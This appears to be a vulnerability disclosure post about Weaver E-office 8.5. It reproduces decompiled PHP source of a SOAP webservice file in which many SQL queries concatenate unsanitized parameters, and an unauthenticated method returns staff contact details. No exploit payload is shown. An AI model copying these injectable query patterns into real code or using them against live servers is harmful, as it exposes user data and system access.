泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)

漏洞作者: menmen519

详细说明:

看了wooyun个大牛发的这个产品的漏洞,感觉版本都过低,这里我发一个8.5的版本,里面新增了webservice的相关操作 下来看代码





webservice/eoffice.wsdl.php:



看看里面的代码:

<?php

/*********************/

/*                   */

/*  Dezend for PHP5  */

/*         NWS       */

/*      Nulled.WS    */

/*                   */

/*********************/



function UserLogin( $userAccount, $password )

{

				global $connection;

				global $_lang;

				if ( trim( $userAccount ) == "" )

				{

								$userLoginReturn['code'] = "0x0000001";

								return $userLoginReturn;

				}

				$checkUserAccountIsExsitQuery = "SELECT * FROM user WHERE USER_ACCOUNTS='".trim( $userAccount )."'";

				$checkUserAccountIsExsitResult = exequery( $connection, $checkUserAccountIsExsitQuery );

				if ( $checkUserAccountIsExsitRow = mysql_fetch_array( $checkUserAccountIsExsitResult ) )

				{

								if ( trim( $checkUserAccountIsExsitRow['USER_ACCOUNTS'] ) != trim( $userAccount ) )

								{

												$userLoginReturn['code'] = "0x0000002";

												return $userLoginReturn;

								}

				}

				else

				{

								$userLoginReturn['code'] = "0x0000002";

								return $userLoginReturn;

				}

				$checkPasswordQuery = "SELECT PASSWORD FROM user WHERE USER_ACCOUNTS='".trim( $userAccount )."'";

				$checkPasswordResult = exequery( $connection, $checkPasswordQuery );

				$checkPasswordRow = mysql_fetch_array( $checkPasswordResult );

				$myPassword = $checkPasswordRow['PASSWORD'];

				if ( crypt( $password, $myPassword ) != $myPassword )

				{

								$userLoginReturn['code'] = "0x0000003";

								return $userLoginReturn;

				}

				$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";

				$cursor = exequery( $connection, $query );

				$ROW = mysql_fetch_array( $cursor );

				$timenow = time( );

				$CUR_TIME = date( "Y-m-d H:i:s", $timenow );

				$query = "update USER set LAST_VISIT_TIME='{$CUR_TIME}' where USER_ID='".$ROW['USER_ID']."'";

				exequery( $connection, $query );

				$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];

				$cursor = exequery( $connection, $query );

				if ( $ROW1 = mysql_fetch_array( $cursor ) )

				{

								$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];

				}

				$LOGIN_THEME = $ROW['THEME'];

				$template = $ROW['TEMPLATE'];

				if ( !$template )

				{

								$template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";

								$template_rs = exequery( $connection, $template_query );

								if ( $row_tp = mysql_fetch_array( $template_rs ) )

								{

												$template = $row_tp['TEMPLATE_NAME'];

								}

								else

								{

												$template = "8series";

								}

				}

				if ( $template == "8series" )

				{

								$mainUrl = "/general/index8.php";

				}

				else if ( $template == "7series" )

				{

								$mainUrl = "/general/index.php";

				}

				else

				{

								$mainUrl = "index8.php";

				}

				if ( $LOGIN_THEME == "" )

				{

								$LOGIN_THEME = "default";

				}

				$LOGIN_THEME = $template."/".$LOGIN_THEME;

				session_start( );

				$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];

				$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];

				$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];

				$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];

				$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];

				$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];

				$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];

				$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;

				$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;

				$_SESSION['LOGIN_LANG'] = "cn";

				$_SESSION['LOGIN_LANG_ID'] = 1;

				$infor['sessionID'] = session_id( );

				$infor['userID'] = $ROW['USER_ID'];

				$infor['deptID'] = $ROW['USER_ID'];

				$infor['privID'] = $ROW['USER_PRIV'];

				$infor['userName'] = $ROW['USER_NAME'];

				$infor['userAccount'] = $ROW['USER_ACCOUNTS'];

				$infor['avatarType'] = $ROW['AVATAR_TYPE'];

				$query = "update USER set LAST_VISIT_TIME='{$CUR_TIME}' where USER_ID='".$ROW['USER_ID']."'";

				exequery( $connection, $query );

				add_log( 1, $_lang['common_login_from_PC'], $ROW['USER_ID'] );

				$query = "SELECT * FROM `sys_para`;";

				$result = exequery( $connection, $query );

				while ( $row = mysql_fetch_array( $result ) )

				{

								switch ( $row['PARA_NAME'] )

								{

												case "slogan" :

																$infor['slogan'] = $row['PARA_VALUE'];

																break;

												case "SMS_FREQUENCY" :

																$infor['smsFrequency'] = $row['PARA_VALUE'];

																break;

								}

				}

				$query = "SELECT * FROM sys_upload WHERE MODULE_NAME='SMS' OR MODULE_NAME ='FILE'";

				$result = exequery( $connection, $query );

				while ( $row = mysql_fetch_array( $result ) )

				{

								if ( $row['MODULE_NAME'] == "SMS" )

								{

												$temp['maxNumber'] = $row['UPLOAD_MAX_NUM'];

												$temp['singleMaxSize'] = $row['UPLOAD_SINGLE_MAX_SIZE'];

												$temp['totalMaxSize'] = $row['UPLOAD_TOTAL_MAX_SIZE'];

												$temp['denySuffix'] = "|".$row['DENY_SUFFIX']."|".UPLOADROLE;

												$infor['smsUploadParam'] = $temp;

								}

								else if ( $row['MODULE_NAME'] == "FILE" )

								{

												$temp['maxNumber'] = $row['UPLOAD_MAX_NUM'];

												$temp['singleMaxSize'] = $row['UPLOAD_SINGLE_MAX_SIZE'];

												$temp['totalMaxSize'] = $row['UPLOAD_TOTAL_MAX_SIZE'];

												$temp['denySuffix'] = "|".$row['DENY_SUFFIX']."|".UPLOADROLE;

												$infor['documentUploadParam'] = $temp;

								}

				}

				$userLoginReturn['code'] = "0x0000000";

				$userLoginReturn['infor'] = $infor;

				return $userLoginReturn;

}



function GetLanguage( )

{

				global $connection;

				$query = "SELECT LANG_ID,LANG_NAME FROM language";

				$result = exequery( $connection, $query );

				$language = array( );

				while ( $row = mysql_fetch_array( $result ) )

				{

								$temp['langID'] = $row['LANG_ID'];

								$temp['langName'] = $row['LANG_NAME'];

								array_push( $language, $temp );

				}

				return $language;

}



function GetMenuLink( $funcCode, $funcName )

{

				if ( trim( $funcCode ) == "" || trim( $funcCode ) == "@" )

				{

								$href = "";

				}

				else if ( strstr( $funcCode, "http://" ) || strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) )

				{

								if ( strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) )

								{

												$funcCode = "/general/".$funcCode;

								}

								if ( strstr( $funcCode, "workflow/new/do.php" ) || strstr( $funcCode, "workflow/new/freedo.php" ) )

								{

												$href = "/general/workflow/flow_redirect.php?url=".urlencode( $funcCode )."&FUNC_ID={$func_id}";

								}

								else

								{

												$href = $funcCode;

								}

				}

				else if ( strstr( $funcCode, "file://" ) )

				{

								$winpath = str_replace( "\\", "/", str_replace( "file://", "", $funcCode ) );

								$winpath = base64_encode( $winpath );

								$href = "/general/winexe/run_cache.php?path=".$winpath."&name=".urlencode( $funcName );

				}

				else if ( strstr( $funcCode, "*" ) )

				{

								$func_code = str_replace( "*", "", $funcCode );

								$href = "/general/loginothersys/run_login.php?id=".$func_code;

				}

				else

				{

								$needle = "?";

								$tmparray = explode( $needle, $funcCode );

								if ( 1 < count( $tmparray ) )

								{

												$href = "/general/".$funcCode."&func_id={$func_id}";

								}

								else

								{

												$href = "/general/".$funcCode."?func_id={$func_id}";

								}

				}

				return $href;

}



function GetUserFuncIDStr( $userPriv )

{

				global $connection;

				$query = "SELECT FUNC_ID_STR from USER_PRIV where USER_PRIV='".$userPriv."'";

				$result = exequery( $connection, $query );

				$row = mysql_fetch_array( $result );

				return substr( $row['FUNC_ID_STR'], 0, -1 );

}



function GetCommonMenu( $userPriv, $userID, $langID )

{

				global $connection;

				$funcIDStr = getuserfuncidstr( $userPriv );

				$funcIDStr = $funcIDStr == "" ? 0 : $funcIDStr;

				$query = "SELECT \r\n\t\t\t\ta.FUNC_NAME AS FUNC_NAME_SYS,\r\n\t\t\t\ta.FUNC_NAME_PY AS FUNC_NAME_PY_SYS,\r\n\t\t\t\ta.FUNC_NAME_ZM AS FUNC_NAME_ZM_SYS,\r\n\t\t\t\tb.FUNC_ID,\r\n\t\t\t\tb.FUNC_NAME AS FUNC_NAME_USER,\r\n\t\t\t\tb.FUNC_NAME_PY AS FUNC_NAME_PY_USER,\r\n\t\t\t\tb.FUNC_NAME_ZM AS FUNC_NAME_ZM_USER,\r\n\t\t\t\tb.FUNC_CODE,\r\n\t\t\t\tb.FUNC_ISSYS,\r\n\t\t\t\tc.FUNC_IMG \r\n\t\t\t\tFROM menu_lang AS a \r\n\t\t\t\tJOIN user_menu AS b \r\n\t\t\t\tON a.FUNC_ID = b.FUNC_ID \r\n\t\t\t\tJOIN sys_function AS c \r\n\t\t\t\tON a.FUNC_ID = c.FUNC_ID \r\n\t\t\t\tWHERE ((b.FUNC_ID IN ({$funcIDStr}) AND b.FUNC_ISSYS=1 AND a.LANG_ID = ".$langID." ) \r\n\t\t\t\tOR b.FUNC_ISSYS=0) \r\n\t\t\t\tAND LEFT(b.FUNC_CODE,1)<>'@' \r\n\t\t\t\tAND b.FUNC_CODE <> '' \r\n\t\t\t\tAND b.USER_ID = '".$userID."' \r\n\t\t\t\tAND b.FUNC_ISSHOW = 1 \r\n\t\t\t\tORDER BY FREQUENCY DESC \r\n\t\t\t\tLIMIT 0,12";

				$result = exequery( $connection, $query );

				$returnArray = array( );

				while ( $row = mysql_fetch_array( $result ) )

				{

								if ( $row['FUNC_ISSYS'] == 1 )

								{

												$funcName = $row['FUNC_NAME_SYS'];

								}

								else

								{

												$funcName = $row['FUNC_NAME_USER'];

								}

								$funcID = $row['FUNC_ID'];

								$menuID = $row['MENU_ID'];

								$funcCode = $row['FUNC_CODE'];

								$funcImg = $row['FUNC_IMG'];

								if ( $funcImg == "" )

								{

												$imgSrc = "/images/8/icons/48/".$funcID.".png";

								}

								else

								{

												$imgSrc = "/attachment/index/48/".$funcImg;

								}

								$imgSrc = file_exists( ROOT_PATH.$imgSrc ) ? $imgSrc : "/images/8/icons/48/default.png";

								$tempArray['funcName'] = $funcName;

								$tempArray['funcID'] = $funcID;

								$tempArray['imageLink'] = $imgSrc;

								$tempArray['menuLink'] = getmenulink( $funcCode, $funcName );

								array_push( $returnArray, $tempArray );

				}

				return $returnArray;

}



function IsHaveChildrenMenu( $userID, $menuID, $funcIDStr )

{

				global $connection;

				$menuLength = strlen( $menuID );

				$query = "SELECT COUNT(*) AS CNT FROM user_menu \r\n\t\t\t   WHERE LEFT(MENU_ID,".$menuLength.")='".$menuID."' \r\n\t\t\t   AND LENGTH(MENU_ID)=".( strlen( $menuID ) + 2 )." \r\n\t\t\t   AND USER_ID='".$userID."' \r\n\t\t\t   AND FUNC_ID IN ({$funcIDStr})\r\n\t\t\t   AND FUNC_ISSHOW = 1";

				$result = exequery( $connection, $query );

				if ( $row = mysql_fetch_array( $result ) )

				{

								if ( 0 < $row['CNT'] )

								{

												return true;

								}

								else

								{

												return false;

								}

				}

}



function GetAllMenu( $userPriv, $userID, $langID )

{

				global $connection;

				$funcIDStr = getuserfuncidstr( $userPriv );

				$funcIDStr = $funcIDStr == "" ? 0 : $funcIDStr;

				$query = "SELECT \r\n\t\t\t\ta.FUNC_NAME AS FUNC_NAME_SYS,\r\n\t\t\t\ta.FUNC_NAME_PY AS FUNC_NAME_PY_SYS,\r\n\t\t\t\ta.FUNC_NAME_ZM AS FUNC_NAME_ZM_SYS,\r\n\t\t\t\tb.FUNC_ID,\r\n\t\t\t\tb.FUNC_NAME AS FUNC_NAME_USER,\r\n\t\t\t\tb.FUNC_NAME_PY AS FUNC_NAME_PY_USER,\r\n\t\t\t\tb.FUNC_NAME_ZM AS FUNC_NAME_ZM_USER,\r\n\t\t\t\tb.FUNC_CODE,\r\n\t\t\t\tb.FUNC_ISSYS,\r\n\t\t\t\tb.MENU_ID,\r\n\t\t\t\tc.FUNC_IMG \r\n\t\t\t\tFROM menu_lang AS a \r\n\t\t\t\tRIGHT JOIN user_menu AS b \r\n\t\t\t\tON a.FUNC_ID = b.FUNC_ID \r\n\t\t\t\tLEFT JOIN sys_function AS c \r\n\t\t\t\tON a.FUNC_ID = c.FUNC_ID \r\n\t\t\t\tWHERE ((b.FUNC_ID IN ({$funcIDStr}) AND b.FUNC_ISSYS=1 AND a.LANG_ID = ".$langID.") \r\n\t\t\t\tOR b.FUNC_ISSYS=0) \r\n\t\t\t\tAND b.USER_ID = '".$userID."' \r\n\t\t\t\tAND b.FUNC_ISSHOW = 1 ORDER BY b.ORDER_ID ASC";

				$result = exequery( $connection, $query );

				$returnArray = array( );

				while ( $row = mysql_fetch_array( $result ) )

				{

								if ( $row['FUNC_ISSYS'] == 1 )

								{

												$funcName = $row['FUNC_NAME_SYS'];

												$funcNamePY = $row['FUNC_NAME_PY_SYS'];

												$funcNameZM = $row['FUNC_NAME_ZM_SYS'];

								}

								else

								{

												$funcName = $row['FUNC_NAME_USER'];

												$funcNamePY = $row['FUNC_NAME_PY_USER'];

												$funcNameZM = $row['FUNC_NAME_ZM_USER'];

								}

								$funcID = $row['FUNC_ID'];

								$menuID = $row['MENU_ID'];

								$funcCode = $row['FUNC_CODE'];

								$funcImg = $row['FUNC_IMG'];

								$menuIDLength = strlen( $menuID );

								if ( $funcCode == "" || strstr( $funcCode, "@" ) !== false )

								{

												$isParent = "true";

								}

								else

								{

												$isParent = "false";

								}

								if ( $isParent == "true" && !ishavechildrenmenu( $userID, $menuID, $funcIDStr ) )

								{

												continue;

								}

								if ( $funcImg == "" )

								{

												$imgSrc = "/images/8/icons/16/".$funcID.".png";

								}

								else

								{

												$imgSrc = "/attachment/index/16/".$funcImg;

								}

								$imgSrc = file_exists( ROOT_PATH.$imgSrc ) ? $imgSrc : "/images/8/icons/16/default.png";

								$tempArray['isParent'] = $isParent;

								$tempArray['funcName'] = $funcName;

								$tempArray['funcNamePY'] = $funcNamePY;

								$tempArray['funcNameZM'] = $funcNameZM;

								$tempArray['funcID'] = $funcID;

								$tempArray['imageLink'] = $imgSrc;

								$tempArray['menuID'] = $menuID;

								$tempArray['menuLink'] = getmenulink( $funcCode, $funcName );

								array_push( $returnArray, $tempArray );

				}

				return $returnArray;

}



function GetMenuByUserID( $userID )

{

				global $connection;

				$query = "SELECT b.FUNC_ID_STR FROM user as a JOIN user_priv as b ON a.USER_PRIV=b.USER_PRIV WHERE a.USER_ID='".$userID."'";

				$result = exequery( $connection, $query );

				if ( $row = mysql_fetch_array( $result ) )

				{

								return $row['FUNC_ID_STR'];

				}

}



function GetUser( )

{

				global $connection;

				$query = "SELECT a.*,b.DEPT_NAME,c.PRIV_NAME \r\n\t\t\t\tFROM user as a \r\n\t\t\t\tJOIN department as b \r\n\t\t\t\tON a.DEPT_ID = b.DEPT_ID \r\n\t\t\t\tJOIN user_priv as c \r\n\t\t\t\tON a.USER_PRIV = c.USER_PRIV \r\n\t\t\t\tWHERE a.DEPT_ID!=0 \r\n\t\t\t\tORDER BY a.LISTNUMBER,a.USER_NAME";

				$result = exequery( $connection, $query );

				$returnArray = array( );

				while ( $row = mysql_fetch_array( $result ) )

				{

								$tempArray['deptID'] = $row['DEPT_ID'];

								$tempArray['userID'] = $row['USER_ID'];

								$tempArray['userName'] = $row['USER_NAME'];

								$tempArray['userPriv'] = $row['USER_PRIV'];

								$tempArray['avatarType'] = $row['AVATAR_TYPE'];

								$tempArray['department'] = $row['DEPT_NAME'];

								$tempArray['userPrivName'] = $row['PRIV_NAME'];

								$tempArray['email'] = $row['EMAIL'];

								$tempArray['phoneNumber'] = $row['MOBIL_NO'];

								$tempArray['birthday'] = $row['BIRTHDAY'];

								$tempArray['userNamePY'] = $row['USER_NAME_PY'];

								$tempArray['userNameZM'] = $row['USER_NAME_ZM'];

								array_push( $returnArray, $tempArray );

				}

				return $returnArray;

}



function GetDept( )

{

				global $connection;

				$query = "SELECT DEPT_ID,DEPT_NAME,DEPT_PARENT FROM department ORDER BY DEPT_NO ASC";

				$result = exequery( $connection, $query );

				$returnArray = array( );

				while ( $row = mysql_fetch_array( $result ) )

				{

								$tempArray['deptID'] = $row['DEPT_ID'];

								$tempArray['deptName'] = $row['DEPT_NAME'];

								$tempArray['deptParent'] = $row['DEPT_PARENT'];

								array_push( $returnArray, $tempArray );

				}

				return $returnArray;

}



function GetPriv( )

{

				global $connection;

				$query = "SELECT USER_PRIV,PRIV_NAME FROM user_priv ORDER BY PRIV_NO";

				$result = exequery( $connection, $query );

				$returnArray = array( );

				while ( $row = mysql_fetch_array( $result ) )

				{

								$tempArray['privID'] = $row['USER_PRIV'];

								$tempArray['privName'] = $row['PRIV_NAME'];

								array_push( $returnArray, $tempArray );

				}

				return $returnArray;

}



function SendMessage( $fromUserID, $toUserID, $content, $attachmentID, $attachmentName )

{

				global $connection;

				$query = "INSERT INTO sms  \r\n\t\t\t(FROM_ID,TO_ID,SMS_TYPE,CONTENT,SEND_TIME,REMIND_FLAG,ATTACHMENT_ID,ATTACHMENT_NAME)\r\n\t\t\tVALUES \r\n\t\t\t('".$fromUserID."','".$toUserID."',0,'".$content."',NOW(),1,'".$attachmentID."','".$attachmentName."')";

				return exequery( $connection, $query );

}



function GetMessage( $userID, $isOnlyNew )

{

				global $connection;

				$CUR_TIME = date( "Y-m-d H:i:s", time( ) );

				$query = "SELECT * FROM sms \r\n\t\t\t\t\tWHERE TO_ID='".$userID."' \r\n\t\t\t\t\tAND receive_del = 0 \r\n\t\t\t\t\tAND send_del  !=1  \r\n\t\t\t\t\tAND SEND_TIME<='{$CUR_TIME}'";

				$limit = " LIMIT 0,30";

				if ( $isOnlyNew )

				{

								$query .= " AND REMIND_FLAG=1";

								$limit = "";

				}

				$query .= " ORDER BY SEND_TIME DESC ".$limit;

				$result = exequery( $connection, $query );

				$returnArray = array( );

				while ( $row = mysql_fetch_array( $result ) )

				{

								$tempArray['smsID'] = $row['SMS_ID'];

								$tempArray['smsType'] = $row['SMS_TYPE'];

								$tempArray['attachmentID'] = $row['ATTACHMENT_ID'];

								$tempArray['attachmentName'] = $row['ATTACHMENT_NAME'];

								$tempArray['fromUserID'] = $row['FROM_ID'];

								$tempArray['fromUserName'] = getusernamenew( $row['FROM_ID'] );

								$tempArray['fromUserAvatar'] = getuseravatartype( $row['FROM_ID'] );

								$tempArray['content'] = $row['CONTENT'];

								$tempArray['sendTime'] = $row['SEND_TIME'];

								$typeArray = getsmstypeurl( $row['SMS_TYPE'], $row['CONTENT'], $row['TABLE_ID'], $row['TABLE_VAR'], $row['TABLE_NAME'], $userID );

								$tempArray['typeText'] = $typeArray['TEXT'];

								$tempArray['typeUrl'] = $typeArray['URL'];

								array_push( $returnArray, $tempArray );

				}

				return $returnArray;

}



function SetMessageRead( $userID, $messageIDStr, $fromUserID )

{

				global $connection;

				$CUR_TIME = date( "Y-m-d H:i:s", time( ) );

				$query = "UPDATE `sms`\r\n\t\t\t\tSET `REMIND_FLAG` = 0 WHERE SEND_TIME<='{$CUR_TIME}' AND TO_ID='".$userID."'";

				if ( $fromUserID != "" )

				{

								$query .= " AND FROM_ID='".$fromUserID."'";

				}

				if ( $messageIDStr != "" )

				{

								$query .= " AND SMS_ID IN ({$messageIDStr})";

				}

				exequery( $connection, $query );

}



function CreateFile( $subject, $attachmentIDStr, $attachmentNameStr, $userID )

{

				global $connection;

				$currentTime = date( "Y-m-d H:i:s", time( ) );

				$query = "INSERT INTO `file_content`\r\n\t\t\t\t(\r\n\t\t\t\t`CONTENT_TYPE`,\r\n\t\t\t\t`SORT_ID`,\r\n\t\t\t\t`FROM_ID`,\r\n\t\t\t\t`SUBJECT`,\r\n\t\t\t\t`SEND_TIME`,\r\n\t\t\t\t`USER_ID`,\r\n\t\t\t\t`ATTACHMENT_ID`,\r\n\t\t\t\t`ATTACHMENT_NAME`,\r\n\t\t\t\t`FILE_TYPE`)\r\n\t\t\t\tVALUES\r\n\t\t\t\t(\r\n\t\t\t\t1,\r\n\t\t\t\t-1,\r\n\t\t\t\t0,\r\n\t\t\t\t'".$subject."',\r\n\t\t\t\t'".$currentTime."',\r\n\t\t\t\t'".$userID."',\r\n\t\t\t\t'".$attachmentIDStr."',\r\n\t\t\t\t'".$attachmentNameStr."',\r\n\t\t\t\t1);";

				exequery( $connection, $query );

				return mysql_insert_id( );

}



function GetNewVersion( )

{

				global $connection;

				$getVersionQuery = "SELECT * FROM `client_version` ORDER BY DATE_TIME DESC LIMIT 0,1";

				$getVersionResult = exequery( $connection, $getVersionQuery );

				if ( $getVersionRow = mysql_fetch_array( $getVersionResult ) )

				{

								$return['version'] = $getVersionRow['VERSION'];

								$getReadmeQuery = "SELECT * FROM `client_version_readme` WHERE CLIENT_VERSION_ID=".$getVersionRow['CLIENT_VERSION_ID'];

								$getReadmeResult = exequery( $connection, $getReadmeQuery );

								while ( $getReadmeRow = mysql_fetch_array( $getReadmeResult ) )

								{

												$temp['subject'] = $getReadmeRow['README_SUBJECT'];

												$temp['describe'] = $getReadmeRow['README_DESCRIBE'];

												$temp['image'] = $getReadmeRow['README_IMAGE'];

												if ( !is_array( $return['readme'] ) )

												{

																$return['readme'] = array( );

												}

												array_push( $return['readme'], $temp );

								}

				}

				return $return;

}



function Attend( $userID, $deptID, $privID, $checkType )

{

				$userInfor['UserId'] = $userID;

				$userInfor['DepyId'] = $deptID;

				$userInfor['PrivId'] = $privID;

				$userInfor['LoginCheck'] = $checkType;

				$attend = new attend( );

				$result = $attend->GetLoginInOut( $userInfor );

				if ( $checkType == "in" )

				{

								return $result['LoginInLateTime'];

				}

				else

				{

								return $result['LoginOutEarlyTime'];

				}

}



function CheckIsSignIn( $userID )

{

				$attend = new attend( );

				$dutyId = $attend->getUserDutyType( $userID );

				$dutyArray = $attend->getDutyData( $dutyId );

				return $attend->isSignIn( $dutyArray, $dutyId, $userID );

}



include_once( "nusoap/lib/nusoap.php" );

include_once( "inc/conn.php" );

include_once( "api/user.class.php" );

include_once( "api/attend.class.php" );

include_once( "inc/utility_all.php" );

include_once( "general/workflow/prcs_role.php" );

include_once( "lang/cn/common.lang.php" );

$server = new soap_server( );

$server->soap_defencoding = "UTF-8";

$server->decode_utf8 = false;

$server->configureWSDL( "EofficeService", "urn:EofficeService" );

$server->wsdl->schemaTargetNamespace = "urn:EofficeService";

$server->wsdl->addComplexType( "UserLoginReturn", "complexType", "struct", "all", "", array( "code" => array( "name" => "code", "type" => "xsd:string" ), "infor" => array( "name" => "infor", "type" => "tns:userInforObj" ) ) );

$server->wsdl->addComplexType( "userInforObj", "complexType", "struct", "all", "", array( "sessionID" => array( "name" => "sessionID", "type" => "xsd:string" ), "userID" => array( "name" => "userID", "type" => "xsd:string" ), "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "privID" => array( "name" => "privID", "type" => "xsd:string" ), "userName" => array( "name" => "userName", "type" => "xsd:string" ), "userAccount" => array( "name" => "userAccount", "type" => "xsd:string" ), "avatarType" => array( "name" => "userAvatar", "type" => "xsd:string" ), "slogan" => array( "name" => "slogan", "type" => "xsd:string" ), "smsFrequency" => array( "name" => "smsFrequency", "type" => "xsd:string" ), "smsUploadParam" => array( "name" => "smsUploadParam", "type" => "tns:smsUploadParam" ), "documentUploadParam" => array( "name" => "documentUploadParam", "type" => "tns:documentUploadParam" ) ) );

$server->wsdl->addComplexType( "smsUploadParam", "complexType", "struct", "all", "", array( "maxNumber" => array( "name" => "maxNumber", "type" => "xsd:string" ), "singleMaxSize" => array( "name" => "singleMaxSize", "type" => "xsd:string" ), "totalMaxSize" => array( "name" => "totalMaxSize", "type" => "xsd:string" ), "denySuffix" => array( "name" => "denySuffix", "type" => "xsd:string" ) ) );

$server->wsdl->addComplexType( "documentUploadParam", "complexType", "struct", "all", "", array( "maxNumber" => array( "name" => "maxNumber", "type" => "xsd:string" ), "singleMaxSize" => array( "name" => "singleMaxSize", "type" => "xsd:string" ), "totalMaxSize" => array( "name" => "totalMaxSize", "type" => "xsd:string" ), "denySuffix" => array( "name" => "denySuffix", "type" => "xsd:string" ) ) );

$server->register( "UserLogin", array( "userAccount" => "xsd:string", "password" => "xsd:string" ), array( "return" => "tns:UserLoginReturn" ), "urn:EofficeService", "urn:EofficeService#UserLogin", "rpc", "encoded", "UserLogin" );

$server->wsdl->addComplexType( "languageRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:languageReturn[]" ) ), "tns:languageReturn" );

$server->wsdl->addComplexType( "languageReturn", "complexType", "struct", "all", "", array( "langID" => array( "name" => "langID", "type" => "xsd:string" ), "langName" => array( "name" => "langName", "type" => "xsd:string" ) ) );

$server->register( "GetLanguage", array( ), array( "return" => "tns:languageRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetLanguage", "rpc", "encoded", "GetLanguage" );

$server->wsdl->addComplexType( "menuRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:menuReturn[]" ) ), "tns:menuReturn" );

$server->wsdl->addComplexType( "menuReturn", "complexType", "struct", "all", "", array( "funcName" => array( "name" => "funcName", "type" => "xsd:string" ), "funcID" => array( "name" => "funcID", "type" => "xsd:string" ), "menuLink" => array( "name" => "menuLink", "type" => "xsd:string" ), "imageLink" => array( "name" => "imageLink", "type" => "xsd:string" ) ) );

$server->register( "GetCommonMenu", array( "userPriv" => "xsd:string", "userID" => "xsd:string", "langID" => "xsd:string" ), array( "return" => "tns:menuRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetCommonMenu", "rpc", "encoded", "GetCommonMenu" );

$server->wsdl->addComplexType( "allMenuRerurnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:allMenuReturn[]" ) ), "tns:allMenuReturn" );

$server->wsdl->addComplexType( "allMenuReturn", "complexType", "struct", "all", "", array( "funcName" => array( "name" => "funcName", "type" => "xsd:string" ), "funcNamePY" => array( "name" => "funcNamePY", "type" => "xsd:string" ), "funcNameZM" => array( "name" => "funcNameZM", "type" => "xsd:string" ), "funcID" => array( "name" => "funcID", "type" => "xsd:string" ), "menuLink" => array( "name" => "menuLink", "type" => "xsd:string" ), "menuID" => array( "name" => "menuID", "type" => "xsd:string" ), "isParent" => array( "name" => "isParent", "type" => "xsd:string" ), "imageLink" => array( "name" => "imageLink", "type" => "xsd:string" ) ) );

$server->register( "GetAllMenu", array( "userPriv" => "xsd:string", "userID" => "xsd:string", "langID" => "xsd:string" ), array( "return" => "tns:allMenuRerurnArray" ), "urn:EofficeService", "urn:EofficeService#GetAllMenu", "rpc", "encoded", "Get All Menu" );

$server->register( "GetMenuByUserID", array( "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#GetMenuByUserID", "rpc", "encoded", "GetMenuByUserID" );

$server->wsdl->addComplexType( "userReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:userReturn[]" ) ), "tns:userReturn" );

$server->wsdl->addComplexType( "userReturn", "complexType", "struct", "all", "", array( "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "userPriv" => array( "name" => "userPriv", "type" => "xsd:string" ), "userID" => array( "name" => "userID", "type" => "xsd:string" ), "userName" => array( "name" => "userName", "type" => "xsd:string" ), "avatarType" => array( "name" => "avatarType", "type" => "xsd:string" ), "department" => array( "name" => "department", "type" => "xsd:string" ), "userPrivName" => array( "name" => "userPrivName", "type" => "xsd:string" ), "email" => array( "name" => "email", "type" => "xsd:string" ), "phoneNumber" => array( "name" => "phoneNumber", "type" => "xsd:string" ), "birthday" => array( "name" => "birthday", "type" => "xsd:string" ), "userNamePY" => array( "name" => "userNamePY", "type" => "xsd:string" ), "userNameZM" => array( "name" => "userNameZM", "type" => "xsd:string" ) ) );

$server->register( "GetUser", array( ), array( "return" => "tns:userReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetUser", "rpc", "encoded", "Get User" );

$server->wsdl->addComplexType( "deptReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:deptReturn[]" ) ), "tns:deptReturn" );

$server->wsdl->addComplexType( "deptReturn", "complexType", "struct", "all", "", array( "deptID" => array( "name" => "deptID", "type" => "xsd:string" ), "deptName" => array( "name" => "deptName", "type" => "xsd:string" ), "deptParent" => array( "name" => "deptParent", "type" => "xsd:string" ) ) );

$server->register( "GetDept", array( ), array( "return" => "tns:deptReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetDept", "rpc", "encoded", "Get Dept" );

$server->wsdl->addComplexType( "privReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:privReturn[]" ) ), "tns:privReturn" );

$server->wsdl->addComplexType( "privReturn", "complexType", "struct", "all", "", array( "privID" => array( "name" => "privID", "type" => "xsd:string" ), "privName" => array( "name" => "privName", "type" => "xsd:string" ) ) );

$server->register( "GetPriv", array( ), array( "return" => "tns:privReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetPriv", "rpc", "encoded", "Get Priv" );

